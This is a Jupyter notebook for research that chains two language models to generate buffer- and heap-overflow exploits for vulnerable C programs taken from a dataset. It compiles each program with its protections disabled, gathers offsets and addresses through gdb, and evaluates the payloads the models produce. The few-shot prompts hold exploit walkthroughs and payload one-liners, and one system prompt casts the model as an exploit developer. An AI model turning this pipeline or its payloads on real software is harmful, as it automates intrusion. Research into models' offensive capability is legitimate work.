# Chit Chat Pipeline

In [None]:
!pip install huggingface_hub datasets -q
!pip install -q accelerate peft trl bitsandbytes transformers

In [None]:
!sudo apt update -y && sudo apt install gdb build-essential -y
!gdb -version
!sudo apt install g++-multilib gcc-multilib -y

In [None]:
from huggingface_hub import login

# Directory that holds the file with the Hugging Face access token.
dir_path = "/home/jovyan"

# Read the token and strip surrounding whitespace: text files usually end with
# a newline, which would otherwise become part of the token passed to login().
with open(f'{dir_path}/hf.txt', 'r') as file:
    hf_token = file.read().strip()

login(token=hf_token)

In [None]:
import re
from huggingface_hub import notebook_login
from sys import argv

from datasets import load_dataset
import torch
from transformers import AutoModelForCausalLM, BitsAndBytesConfig, AutoTokenizer, TrainingArguments
from peft import LoraConfig
from trl import SFTTrainer
import gdb


from peft import AutoPeftModelForCausalLM

In [None]:
!pip install -q huggingface
from transformers import (
    AutoModelForCausalLM,
    pipeline,
)

In [None]:

# gdb variables: module-level defaults for the values returned by gdb.main().
# NOTE(review): preprocess_input() unpacks gdb.main() into local names that
# shadow these, so the globals below are not updated by that function.
nome_funzione_target = ""
distanza_var_f = {}
distanza_var_var = {}
val_distanza_var_f = {}
val_distanza_var_var = {}
indirizzo_f_target = ""
indirizzo_system = ""
indirizzo_binsh = ""
# end of gdb variables


# Hub id of the first model, the one queried through generate_reply().
base_model_name = "MarioVar/llama2-7b-hf-finetuned-chitchat"

# 4-bit NF4 quantization settings.
# NOTE(review): this config is not passed to the from_pretrained() call below,
# so it has no effect on `model` in this cell — confirm whether that is intended.
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
    bnb_4bit_use_double_quant=True,
)

# Place the whole model on device index 0.
device_map = {"": 0}

tokenizer = AutoTokenizer.from_pretrained(base_model_name, trust_remote_code=True)
# Reuse the end-of-sequence token as the padding token.
tokenizer.pad_token = tokenizer.eos_token

model = AutoPeftModelForCausalLM.from_pretrained(base_model_name, device_map=device_map, torch_dtype=torch.bfloat16)

In [None]:
# Hub id of the second model; its outputs are stored under phase_outputs/model_b
# by the pipeline loop further down.
base_model_name_2 = "deepseek-ai/DeepSeek-R1-Distill-Llama-8B" 

# Dedicated padding token registered on the second tokenizer.
# NOTE(review): no resize_token_embeddings() call is visible in this cell —
# confirm the new token id is valid for model_2 if padded batches are ever used.
PAD_TOKEN = "<|pad|>"
tokenizer_2 = AutoTokenizer.from_pretrained(base_model_name_2, use_fast=True)
tokenizer_2.add_special_tokens({"pad_token": PAD_TOKEN})
tokenizer_2.padding_side = "right"


# 4-bit NF4 quantization settings; unlike the first model, they are actually
# passed to from_pretrained() below. This rebinds the earlier `bnb_config`.
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
    bnb_4bit_use_double_quant=True,
)

model_2 = AutoModelForCausalLM.from_pretrained(base_model_name_2,
                                             quantization_config=bnb_config,
                                             device_map='auto')

In [None]:

# Text-generation pipeline around the second model; call_model_2() indexes its
# result as [0]['generated_text'].
# NOTE(review): max_new_tokens=100000 is a very large cap; the only other bound
# visible in this file is the SIGALRM timeout used by call_model_2().
pipe_model_2 = pipeline(
    task="text-generation",
    model=model_2,
    tokenizer=tokenizer_2,
    max_new_tokens=100000,
    return_full_text=False, # If set to False only added text is returned, otherwise the full text is returned. Cannot be specified at the same time as return_text.
)

In [None]:
import struct

def state_change(fase, output):
    """Advance the conversation phase when the model output contains the
    phrase expected for the current phase.

    The output is lower-cased before the search. On a match the output is
    printed and the next phase is returned (1 -> 2 -> 3 -> 1). Otherwise an
    apology message is printed and the phase is returned unchanged. Phases
    other than 1, 2 and 3 are returned untouched without printing anything.
    """
    # phase -> (lower-case trigger phrase, phase to move to on a match)
    transitions = {
        1: ("explain to me", 2),
        2: ("what information", 3),
        3: ("assuming that", 1),
    }
    if fase not in transitions:
        return fase

    trigger, next_fase = transitions[fase]
    if re.search(trigger, output.lower()):
        print(output)
        return next_fase

    print("Mi dispiace non ho ben capito cosa fare...\n")
    return fase
def estrazione_risultato(raw_result):
    """Return the text between the first "### Response:" marker and the
    following "### Response:" / "### End" marker (or the end of the string).

    Raises IndexError when "### Response:" does not occur in ``raw_result``.
    """
    inizio = "### Response:"
    fine = "### End"
    # Segment that follows the first response marker.
    dopo_inizio = raw_result.split(inizio)[1]
    # Drop everything from the end marker onwards, when present.
    return dopo_inizio.split(fine)[0]

#prelievo dell'input dall'utente

#preparazione dell'input per il modello
def _format_address_bytes(hex_address):
    """Render a 32-bit hex address as an escaped byte string (\\xNN\\xNN\\xNN\\xNN).

    Bytes are emitted most-significant first (struct format ">I"), i.e. in the
    same order as the hex digits are written; no little-endian swap is applied.
    """
    packed = struct.pack(">I", int(hex_address, 16))
    return ''.join(f'\\x{byte:02x}' for byte in packed)


def preprocess_input(raw_input, fase):
    """Build the instruction prompt sent to the first model for phase ``fase``.

    Args:
        raw_input: text appended to the "### Input:" section in every phase.
        fase: conversation phase. 1 asks for an explanation of the exploit,
            2 asks which information is needed, 3 adds a bullet list built
            from ``gdb.main(path_input_gdb, path_eseguibile)`` (both paths are
            read from module-level globals). Any other value leaves the
            instruction text empty.

    Returns:
        The prompt: prologue + instruction + input section + "### Response:".
    """
    prologue = "Below is an instruction that describes a Question Generation task\n"
    instruction = "### Instruction: "
    input_section = "### Input:\n"
    response = "### Response:"

    if fase == 1:
        instruction += "Request an explanation on how to perform the exploit of the following program\n"
    elif fase == 2:
        instruction += "Ask what information is needed to proceed with the exploit\n"
    elif fase == 3:
        (nome_funzione_target, distanza_var_f, val_distanza_var_f,
         val_distanza_var_var, indirizzo_f_target, indirizzo_system,
         indirizzo_binsh, distanza_var_var) = gdb.main(path_input_gdb, path_eseguibile)

        # Collected bullet lines (kept in a list instead of a variable named
        # `list`, which shadowed the builtin).
        items = []
        if distanza_var_f:
            for key in distanza_var_f:
                items.append("- offset between " + distanza_var_f[key] + " and return address: " + str(val_distanza_var_f[key]) + " bytes" + "\n")
        # Require the address as well as the name: previously a name with an
        # empty address hit an unbound local variable.
        if nome_funzione_target != "" and indirizzo_f_target != "":
            items.append("- " + nome_funzione_target + "(): " + _format_address_bytes(indirizzo_f_target) + "\n")
        if indirizzo_system != "":
            items.append("- system() address: " + _format_address_bytes(indirizzo_system) + "\n")
        if indirizzo_binsh != "":
            items.append("- /bin/sh address: " + indirizzo_binsh + "\n")
        if distanza_var_var:
            for key in distanza_var_var:
                items.append("- offset between " + distanza_var_var[key][0] + " and " + distanza_var_var[key][1] + ": " + str(val_distanza_var_var[key]) + " bytes\n")

        input_section += "list:\n" + "".join(items) + "\n"
        instruction += "Below is provided a list of useful information and an explanation of the details needed to create an exploit for the vulnerable program. Analyze the explanation, use the provided list to gather the required information, and finally, request the generation of an input that exploits the vulnerability.\n"

    input_section += raw_input + "\n"
    return prologue + instruction + input_section + response


def generate_reply(prompt):
    """Generate a reply from the first model and return only its response part.

    The prompt is tokenized and moved to 'cuda', up to 200 new tokens are
    generated, the first sequence is decoded without special tokens and
    passed through estrazione_risultato().
    """
    encoded = tokenizer(prompt, return_tensors="pt").to('cuda')
    generated = model.generate(
        input_ids=encoded["input_ids"],
        attention_mask=encoded["attention_mask"],
        max_new_tokens=200,
        pad_token_id=tokenizer.eos_token_id,
    )
    decoded = tokenizer.decode(generated[0], skip_special_tokens=True)
    return estrazione_risultato(decoded)

def generate_reply_using_pipeline(prompt,pipeline_model1):
    """Call ``pipeline_model1`` with ``prompt`` and return the
    'generated_text' field of its first result."""
    results = pipeline_model1(prompt)
    first_result = results[0]
    return first_result['generated_text']

def get_multiline_input():
    """Read lines from input() until a line that equals 'EOF' once stripped.

    Returns the lines read before the terminator, joined with newlines; the
    terminator line itself is not included.
    """
    collected = []
    # iter(input, None) keeps calling input(); the loop ends only on 'EOF'.
    for line in iter(input, None):
        if line.strip() == 'EOF':
            break
        collected.append(line)
    return '\n'.join(collected)


#base_model.config.use_cache = False


def main():
    """Run the interactive three-phase conversation loop.

    Each turn reads a multi-line message (terminated by 'EOF'). 'exit' ends
    the loop, 'ricomincia' resets the phase to 1, and any other message is
    turned into a prompt, sent to the model, and the reply is used to decide
    the next phase via state_change().
    """
    fase = 1

    print("Benvenuto nella conversazione.\n Digita 'exit' per terminare la conversazione quando lo desideri.\n Digita 'ricomincia' per iniziare una nuova conversazione di exploit.\n IMPORTANTE: Digita 'EOF' quando vuoi inviare un messaggio al modello ")
    while True:
        print(f"siamo nella fase {fase}\n")
        if fase == 1:
            print("Inserisci un programma vulnerabile: \n")
        elif fase in (2, 3):
            print("User:\n")

        user_input = get_multiline_input()
        comando = user_input.lower()
        if comando == 'exit':
            print("fine della conversazione! Ciao!")
            break
        if comando == 'ricomincia':
            fase = 1
            continue

        model_input = preprocess_input(user_input, fase)
        risposta = generate_reply(model_input)
        fase = state_change(fase, risposta)



In [None]:
from datasets import load_dataset

# Load the 'train' split of the vulnerable-code dataset from the Hub.
cpp_dataset = load_dataset("MarioVar/vulnerable-code_chitchat_doss1232")['train']
print(cpp_dataset)
# NOTE: despite its name, this is the pandas DataFrame returned by to_pandas().
cpp_dataset_dict = cpp_dataset.to_pandas()
cpp_dataset_dict.head()

In [None]:
import os
# NOTE(review): dirname(abspath('.')) is the PARENT of the working directory,
# not the working directory itself — confirm that this is what is wanted.
current_dir = os.path.dirname(os.path.abspath('.')) 


In [None]:
def get_system_prompt(phase):
    """Return the system prompt used for the second model in ``phase``.

    Phase 1 asks for the vulnerability and the exploit steps, phase 2 asks
    which information is needed (addresses, offset, architecture,
    endianness), and any other value returns the payload-generation prompt.
    The literals are returned verbatim, including their trailing whitespace.
    """
    if phase == 1:
        return """Given the C/C++ program provided below, identify the vulnerability and explain how to exploit it in a series of clear, concise steps. Specifically, do the following:
Identify the Vulnerability Type: Determine if there is a buffer overflow in the code.
Explain the Exploit in Step-by-Step Process: Provide a concise list of steps an attacker would take to exploit the vulnerability (e.g., crafting input, triggering the overflow, gaining control).
Input Example: Provide an example of malicious input that triggers the vulnerability.
Focus on providing a succinct and clear explanation of the exploit process."""
    elif phase==2:
        return """Given the following C/C++ program, provide a concise, structured response with the following information:
Memory Address of Target Variable/Target Function: Explain how to find the address of the target variable relative to the buffer or the address of the target function to call.
Overflow Offset: Describe how to determine the number of bytes needed to overflow the buffer and reach the target variable or the return address on the stack.
Architecture type: The architecture is 32-bit or 64-bit (specify which one applies).
Endianness: Specify whether the system uses little-endian or big-endian."""
    else:
        return """
You are an expert in exploit development. Your task is to generate an attack payload in the format:  
`"<char>"*<offset> + <bytes>`  
where:  
- `<char>` is a filler character to overwrite memory until the target point.  
- `<offset>` is the number of filler characters needed.  
- `<bytes>` depends on the vulnerability type:  
  - **For buffer overflows**, `<bytes>` is the little-endian address of the target function to call.  
  - **For heap overflows**, `<bytes>` is a dummy value suitable for corrupting the target variable, which can be of any type.  

Think step by step:  
1. Determine the correct `<offset>` to reach the target memory location.  
2. Choose an appropriate `<char>` for padding.  
3. Format `<bytes>` correctly based on the vulnerability type. 
"""

def get_example_1(phase):
    """Return the first few-shot example (a stack buffer overflow) for ``phase``.

    The result is a two-element list: [user message, assistant reply].
    Phase 1 is the "explain the exploit" exchange, phase 2 the "what
    information is needed" exchange, and any other value the payload
    generation exchange (raw strings, so the backslash-x sequences stay
    literal text).

    NOTE(review): the bash snippet in the last reply nests double quotes and
    adds a str to a bytes literal, so it is not runnable as written — confirm
    whether the model should be shown this exact form.
    """
    if phase == 1:
        return ["""Explain to me how to exploit the following program:
#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[50];
    strcpy(buffer, input);  // Vulnerability: no bounds check, buffer overflow possible
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Passing user input to the vulnerable function
    }
    return 0;
}
""","""Vulnerability Type: Buffer Overflow (due to strcpy with no bounds checking).
Exploit Steps:
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s).
Step 2: Pass this input as a command-line argument to the program.
Step 3: The input overwrites the buffer and potentially the return address on the stack.
Step 4: The attacker can place a malicious address or shellcode in the overflowed space, redirecting the program's execution.
Input Example:
./vulnerable_program $(python -c "print('A' * 51)")
"""]
    elif phase==2:
        return ["""Given this code:
#include <stdio.h>
#include <string.h>
void secret_function() {
    // Apre il file in modalità append
    std::ofstream outfile("log_call.txt", std::ios_base::app); // `std::ios_base::app` è per aggiungere al file

    if (outfile.is_open()) {
        outfile << "well done!" << std::endl;
        outfile.close();
    } else {
        std::cerr << "Impossibile aprire il file per la scrittura!" << std::endl;
    }
}

void vulnerable_function(char *input) {
    char buffer[50];
    strcpy(buffer, input);  // Vulnerability: no bounds check, buffer overflow possible
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Passing user input to the vulnerable function
    }
    return 0;
}
Exploit Steps:
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s).
Step 2: Pass this input as a command-line argument to the program.
Step 3: The input overwrites the buffer and potentially the return address on the stack.
Step 4: The attacker can place a malicious address or shellcode in the overflowed space, redirecting the program's execution.
Input Example:
./vulnerable_program $(python -c "print('A' * 51)")
What information do you need in order to overflows the buffer and change the value of the return address?
""","""
To exploit the provided code:
Memory Address of Target Variable/Target Function: Use gdb to inspect the stack and find the address of the secret_function.
Overflow Offset: Use gdb to find the number of bytes needed to reach the return address or target variable (e.g., by inspecting the stack layout after overflowing the buffer).
Architecture Type: Check with gdb or file to determine if the architecture is 32-bit or 64-bit.
Endianness: Confirm with gdb or check the system documentation. Typically, x86 and x86_64 architectures are little-endian.
"""]
    else:
        return [r"""
Given this code
#include <stdio.h>
#include <string.h>
void secret_function() {
    // Apre il file in modalità append
    std::ofstream outfile("log_call.txt", std::ios_base::app); // `std::ios_base::app` è per aggiungere al file

    if (outfile.is_open()) {
        outfile << "well done!" << std::endl;
        outfile.close();
    } else {
        std::cerr << "Impossibile aprire il file per la scrittura!" << std::endl;
    }
}

void vulnerable_function(char *input) {
    char buffer[50];
    strcpy(buffer, input);  // Vulnerability: no bounds check, buffer overflow possible
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Passing user input to the vulnerable function
    }
    return 0;
}
Assuming that:
- System architecture target is x86 32 bit little endian
- ASLR mechanism is disable
- Stack canaries mechanism is disable
- The offset between 'buffer' and 'return address' is 54 bytes
- The address of 'secret_function()' function is \xe2\x2e\x55\x55
Create an input that exploits the vulnerability in order to execute the 'secret_function()'
""",r"""
This is a stack-based buffer overflow, meaning our goal is to hijack execution flow by overwriting the return address to execute a chosen function.
Here is the exploit payload that will overwrite the return address and execute secret_function():
Step 1. Determine the offset (offset = 54)
The return address is 54 bytes after the buffer, so we need 54 padding characters to reach it.
Step 2. Choose the filler character (char)
We use "A" (\x41 in hex) as the filler.
Step 3. Determine the byte data to overwrite the target memory area (bytes = "\xe2\x2e\x55\x55")
The address of `secret_function()` is given as `\xe2\x2e\x55\x55`.
Since the system is **x86 32-bit little-endian**, the address needs to be converted to little-endian format. The little-endian representation of `\xe2\x2e\x55\x55` is `\x55\x55\x2e\xe2`
Step 4: Final Payload
```bash
./vulnerable_program $(python -c "print("A" * 54 + b"\x55\x55\x2e\xe2")")
```
This injects 54 "A" characters followed by the overwritten return address.
When executed, the program will jump to secret_function() instead of returning normally.
"""]

def get_example_2(phase):
    """Return the second few-shot example (a heap overflow) for ``phase``.

    The result is a two-element list: [user message, assistant reply].
    Phase 1 is the "explain the exploit" exchange, phase 2 the "what
    information is needed" exchange, and any other value the payload
    generation exchange (raw strings, so the backslash-x sequences stay
    literal text).

    NOTE(review): in the last reply the steps are numbered 1-3 and then
    "Step 5", and the bash snippet nests double quotes and adds a str to a
    bytes literal — confirm whether the model should be shown this exact form.
    """
    if phase == 1:
        return ["""Explain to me how to exploit the following program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(50 * sizeof(char));  // Allocate 50 bytes on the heap
    int secret = 12345;  // Variable to be overwritten
    if (buffer == NULL) {
        printf("Memory allocation failed\n");
        return;
    }
    strcpy(buffer, input);  // Vulnerability: No bounds check, heap overflow possible

    printf("Secret before overflow: %d\n", secret);
    printf("Input: %s\n", buffer);

    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Pass user input to the vulnerable function
    }
    return 0;
}
""","""Vulnerability Type: Heap Overflow (due to strcpy with no bounds checking). 
Exploit Steps: 
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s followed by "B"s). 
Step 2: Pass this input as a command-line argument to the program. 
Step 3: The input overflows the heap buffer and can overwrite the adjacent secret variable. 
Step 4: The attacker can change the secret variable’s value by crafting the input appropriately. 
Input Example:
./vulnerable_program $(python -c "print('A' * 51 + 'B' * 4)")
"""]
    elif phase==2:
        return ["""Given this code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(50 * sizeof(char));  // Allocate 50 bytes on the heap
    int secret = 12345;  // Variable to be overwritten
    if (buffer == NULL) {
        printf("Memory allocation failed\n");
        return;
    }
    strcpy(buffer, input);  // Vulnerability: No bounds check, heap overflow possible

    printf("Secret before overflow: %d\n", secret);
    printf("Input: %s\n", buffer);

    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Pass user input to the vulnerable function
    }
    return 0;
}
Exploit Steps: 
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s followed by "B"s). 
Step 2: Pass this input as a command-line argument to the program. 
Step 3: The input overflows the heap buffer and can overwrite the adjacent secret variable. 
Step 4: The attacker can change the secret variable’s value by crafting the input appropriately. 
Input Example:
./vulnerable_program $(python -c "print('A' * 51 + 'B' * 4)")
What information do you need in order to overflows the buffer and change the value of the secret variable?
""","""To exploit the provided code:
Memory Address of Target Variable/Target Function:  Use `gdb` to find the address of `secret` relative to the buffer.
Overflow Offset: Use `gdb` to determine how many additional bytes are needed to reach `secret`.
Architecture Type: Check with gdb or file to determine if the architecture is 32-bit or 64-bit.
Endianness: Confirm with gdb or check the system documentation. Typically, x86 and x86_64 architectures are little-endian.
"""]
    else:
        return [r"""Given this code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(50 * sizeof(char));  // Allocate 50 bytes on the heap
    int secret = 12345;  // Variable to be overwritten
    if (buffer == NULL) {
        printf("Memory allocation failed\n");
        return;
    }
    strcpy(buffer, input);  // Vulnerability: No bounds check, heap overflow possible

    printf("Secret before overflow: %d\n", secret);
    printf("Input: %s\n", buffer);

    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Pass user input to the vulnerable function
    }
    return 0;
}       
Assuming that:
- System architecture target is x86 32 bit little endian
- ASLR mechanism is disable
- Stack canaries mechanism is disable
- The offset between the 'buffer' array  and the variable 'secret' is 50 bytes
Create an input that exploits the vulnerability in order to modify the value of the variable 'secret' to a non-zero value.      
""",r"""This is a heap-based overflow affecting a stack variable, meaning our goal is to modify secret instead of hijacking execution flow.
Here is the exploit payload that will overwrite the target variable:
1. Determine the correct `<offset>` to reach the target memory location (offset = 50): 
The vulnerable buffer is allocated with 50 bytes on the heap (malloc(50)).
The secret variable is immediately after the buffer in memory.
To reach and overwrite secret, we need to write exactly 50 bytes to fill the buffer.
2. Choose an appropriate `<char>` for padding (char = "A"): 
We use "A" (\x41 in hex) as the padding character to fill the buffer until we reach secret.
3. Format `<bytes>` correctly based on the vulnerability type (bytes = "\xef\xbe\xad\xde");
The secret variable is an integer (int), meaning it occupies 4 bytes.
We want to overwrite secret with a nonzero value, so we choose 0xdeadbeef. 
Step 5: Final Payload
```bash
./vulnerable_program $(python -c "print("A" * 50 + b"\xef\xbe\xad\xde")")
```
This injects 50 "A" characters to overflow buffer, followed by our chosen integer value.
When printed, secret will be changed from 12345 to \xef\xbe\xad\xde.
"""]


In [None]:
def create_test_prompt(phase: int,model_a_prompt: str,model_b_prev_output=None): 
    """Build the chat-formatted few-shot prompt for the second model.

    The conversation is: the system prompt for ``phase``, two worked examples
    (user/assistant pairs from get_example_1 and get_example_2), and a final
    user turn made of the previous second-model output followed by
    ``model_a_prompt``.

    Args:
        phase: pipeline phase used to select the system prompt and examples.
        model_a_prompt: text produced by the first model for this phase.
        model_b_prev_output: context carried over from the previous phase.
            ``None`` (the default) is treated as an empty string; previously
            it was rendered as the literal text "None" inside the prompt.

    Returns:
        The untokenized prompt string produced by
        ``tokenizer_2.apply_chat_template`` with the generation prompt added.
    """
    previous_output = "" if model_b_prev_output is None else model_b_prev_output
    example_1 = get_example_1(phase)
    example_2 = get_example_2(phase)
    messages = [
        {"role": "system", "content": get_system_prompt(phase)},
        {"role": "user", "content": example_1[0]},
        {"role": "assistant", "content": example_1[1]},
        {"role": "user", "content": example_2[0]},
        {"role": "assistant", "content": example_2[1]},
        {"role": "user", "content": f"{previous_output}\n{model_a_prompt}\n"},
    ]
    return tokenizer_2.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)

In [None]:
# Preview the phase-1 prompt with a placeholder instead of real code.
print(create_test_prompt(1,"<HERE_THE_CODE>",None))

In [None]:
# Preview the phase-2 prompt with placeholders for the code and the previous reply.
print(create_test_prompt(2,"\n\n\t<HERE_THE_CODE>\n\n","\n\n\t<HERE_THE_PHASE_1_MODELB_RESPONSE>\n\n"))

In [None]:
# Preview the phase-3 prompt with placeholders for the code and the previous reply.
print(create_test_prompt(3,"\n\n\t<HERE_THE_CODE>\n\n","\n\n\t<HERE_THE_PHASE_1_MODELB_RESPONSE>\n\n"))

## In-House Pipeline

In [None]:
import signal
import json
from tqdm import tqdm
import time
TIMEOUT_SECONDS = 300
class TimeoutException(Exception):
    """Raised by timeout_handler when the alarm signal fires."""
def timeout_handler(signum, frame):
    """Signal handler that turns an alarm into a TimeoutException.

    Both arguments are supplied by the signal machinery and are ignored.
    """
    message = "The operation timed out."
    raise TimeoutException(message)



def _run_with_timeout(task, payload, label, color, retry_limit):
    """Run ``task(payload)`` under a SIGALRM watchdog, retrying on timeout.

    Args:
        task: callable invoked with ``payload``.
        payload: single argument handed to ``task``.
        label: name shown in the retry message (e.g. "Model 1").
        color: ANSI colour code used for the retry message.
        retry_limit: maximum number of attempts.

    Returns:
        Whatever ``task`` returns on the first attempt that completes in time.

    Raises:
        TimeoutException: when every attempt exceeded TIMEOUT_SECONDS.
            Previously the callers silently received ``None`` in that case.
    """
    signal.signal(signal.SIGALRM, timeout_handler)
    for attempt in range(1, retry_limit + 1):
        try:
            signal.alarm(TIMEOUT_SECONDS)  # arm the watchdog for this attempt
            return task(payload)
        except TimeoutException:
            print(f"\033[{color}m[{label} Task ~ {attempt} of {retry_limit}] ~ Timeout occurred. Retrying...\033[0m")
        finally:
            signal.alarm(0)  # always disarm, on success, timeout or error
    raise TimeoutException(
        f"{label} did not answer within {TIMEOUT_SECONDS} seconds after {retry_limit} attempt(s)."
    )


def call_model_1(model_input,retry_limit = 5):
    """Query the first model through generate_reply() with timeout and retries.

    Raises TimeoutException when all ``retry_limit`` attempts time out.
    """
    return _run_with_timeout(generate_reply, model_input, "Model 1", "31", retry_limit)


def call_model_2(prompt,retry_limit = 5):
    """Query the second model through pipe_model_2 with timeout and retries.

    Returns the 'generated_text' of the first pipeline result. Raises
    TimeoutException when all ``retry_limit`` attempts time out.
    """
    def _generate(text):
        return pipe_model_2(text)[0]['generated_text']

    return _run_with_timeout(_generate, prompt, "Model 2", "32", retry_limit)


runLocalModel=True # set false if you want to execute phase3 of Model B using groq
init = True
path_input_gdb=None
path_eseguibile=None
valid_filenames = []
for i in tqdm(range(0,len(cpp_dataset)), desc="Processing Files", unit="file"):
    data = cpp_dataset[i]
    in_phase_processing=True
    output = ""
    # output_model2 = ""
    while in_phase_processing:
        try: 
            if init==True:
                init=False
                fase=1
            print(f"Preparing processing: phase {fase} on element having index {i}")
            
            if data['input_gdb_path'] is not None:
                print(f"Running phase {fase} on element having index {i}")

                cpp_name = data['file_path'].split('/')[-1].replace('.', '_')
                path_input_gdb = f"./vuln_code/input_gdb_{cpp_name}.txt"
                input_cpp_path = "./vuln_code/program.cpp"
                path_eseguibile = "./vuln_code/compiled/program"
    
                with open("./vuln_code/program.cpp","w") as f:
                    f.write(data['code'])

                with open(path_input_gdb,"w") as f:
                    f.write(data['input_gdb_content'])
                
                !g++ -m32 -g -O0 -fno-stack-protector -z execstack -o "./vuln_code/compiled/program" "./vuln_code/program.cpp" "./vuln_code/flag_func.cpp"
                

                
                model_input = preprocess_input(data['code'], fase) #il primo parametro non è usato, quindi lascio fisso code
                output = call_model_1(model_input)


                with open(f'./phase_outputs/model_a/{cpp_name}_{fase}.txt', 'w') as f:
                        f.write(output)
                if fase==3:
                    with open(f'./phase_outputs/model_a/{cpp_name}.txt', 'w') as f:
                        f.write(output)

                if fase==1:
                    model_2_output=''

                elif fase==2:
                    model_2_output="Given the code:\n"+data['code']+"\n"+model_2_output
                else:
                    model_2_output="Given the code:\n"+data['code']+"\n"
                
                model_2_prompt = create_test_prompt(fase,output,model_2_output)
                with open(f'./phase_outputs/model_b/prompt/{cpp_name}_{fase}.txt', 'w') as f:
                        f.write(model_2_prompt)                                
                print(f"\033[33m{model_2_prompt}\033[0m")


        
                model_2_output = call_model_2(model_2_prompt)
                model_2_output = model_2_output.split('</think>')[-1]
                with open(f'./phase_outputs/model_b/{cpp_name}_{fase}.txt', 'w') as f:
                        f.write(model_2_output)
                        
        
                    # output_model2 += f"fase: {fase}\nmodel_output:\n{model_2_output}"        



                
                if fase == 3:
                    # with open(f'selected_samples_rerun/{cpp_name}.txt', 'w') as f:
                    #     f.write(output_model2)

                    print("Fase 3 reached, analyzing next code")
                    #exit the while
                    init=True
                    in_phase_processing=False
                    valid_filenames.append(f'{cpp_name}.txt')
                else:
                    fase = state_change(fase, output)

            else: # input gdb none => skip this element
                print(f"No inputGdbFile found for the element having having index {i}.")
                init=True
                in_phase_processing=False
                with open(f"./phase_outputs/logs/{cpp_name}_elementindex{i}","w") as f:           
                    f.write(f"Skipped {e}.\n\t file_name: {cpp_name}\n\tIndex for cpp dataset:{i}\n\t reason: No Gdb for this file.")
        except Exception as e:
            print(e)
            init=True
            in_phase_processing=False
            with open(f"./phase_outputs/logs/{cpp_name}_elementindex{i}","w") as f:           
                f.write(f"Error {e}.\n\t file_name: {cpp_name}\n\tIndex for cpp dataset:{i}\n\tFase:{fase}")

with open('valid_filed_processed.json','w') as f:
    json.dump(valid_filenames,f)


## In-House Pipeline Evaluation

In [None]:

def format_little_endian(hex_address):
    """Render a hex address as an escaped little-endian byte string.

    An optional "0x"/"0X" prefix is dropped and the digits are left-padded
    with zeros to at least 4 bytes (and to a whole number of bytes), then the
    bytes are emitted least-significant first, e.g. "0x08049196" becomes
    the text \\x96\\x91\\x04\\x08. Addresses wider than 4 bytes are converted in
    full instead of being truncated to their first 8 hex digits.
    """
    digits = hex_address.strip()
    if digits[:2] in ('0x', '0X'):
        digits = digits[2:]
    # At least 8 hex digits, and always an even number of them.
    width = max(8, len(digits) + len(digits) % 2)
    digits = digits.zfill(width)
    byte_pairs = [digits[i:i + 2] for i in range(0, width, 2)]
    return '\\x' + '\\x'.join(reversed(byte_pairs))


In [None]:
import re

def extract_info(text):
    """Extract the expected offset and return address from a model-A message.

    Args:
        text: message to scan.

    Returns:
        ``(offset, address)`` where ``offset`` is the integer found in
        "The offset between ... and the return address is N bytes" (or None),
        and ``address`` is the last run of four escaped bytes on the first
        line that contains one, with the byte order reversed (or None).
    """
    # Offset
    offset_match = re.search(r"The offset between .* and the return address is (\d+) bytes", text)
    offset = int(offset_match.group(1)) if offset_match else None

    # Function address
    addr_match = re.search(r".*((?:\\x[0-9a-fA-F]{2}){4})", text)
    if addr_match is None:
        return offset, None

    # Use the capture group, not group(0): group(0) also contains the line
    # prefix consumed by ".*", so extra escaped bytes earlier on the line
    # used to leak into the address.
    raw_bytes = re.findall(r"\\x([0-9a-fA-F]{2})", addr_match.group(1))
    little_endian_address = ''.join(f'\\x{byte}' for byte in reversed(raw_bytes))
    return offset, little_endian_address




In [None]:
def extract_offset_and_address(payload):
    """Extract the padding length and the 4-byte address from a payload command.

    The './vulnerable_program' text is removed first. The padding is
    recognised either as a repeated character (for example 'A' * 22), where
    the multiplier is the offset, or as a literal run that precedes four
    escaped bytes, where the length of the captured text is the offset. When
    several matches exist the last one wins.

    Returns:
        ``(offset, address)``; each element is None when it is not found.
    """
    command = payload.replace('./vulnerable_program', '')

    padding_re = re.compile(r'(?:.*print.*["\']([A-Za-z])["\']\s*\*\s*(\d+)|.*print.*["\']([A-Za-z].*)(?:\\x[0-9a-fA-F]{2}){4})')
    offset = None
    for _filler, repeat_count, literal_padding in padding_re.findall(command):
        if repeat_count:        # form: "A" * 22
            offset = int(repeat_count)
        elif literal_padding:   # form: "AAAAAAAAA" written out in full
            offset = len(literal_padding)

    # Address written as four escaped bytes.
    found = re.search(r"(?:\\x[0-9a-fA-F]{2}){4}", command)
    address = found.group(0) if found else None
    return offset, address

In [None]:
import re
# Counters for the reasons why a processed sample is not counted as valid.
skipped_elements = {'invalid_dummy_char':0,
                    'invalid_generated_return_address':0,
                    'return_address_or_offset_different_from_expected':0,
                    'ground_truth_return_address_or_offset_not_found':0,
                    'invalid_offset':0,
                    'invalid_model_b_response':0,
                    'from_exception':0
                   }
# Payload strings that matched the expected offset and address.
valid_elements=[]
import os
current_path = os.getcwd()
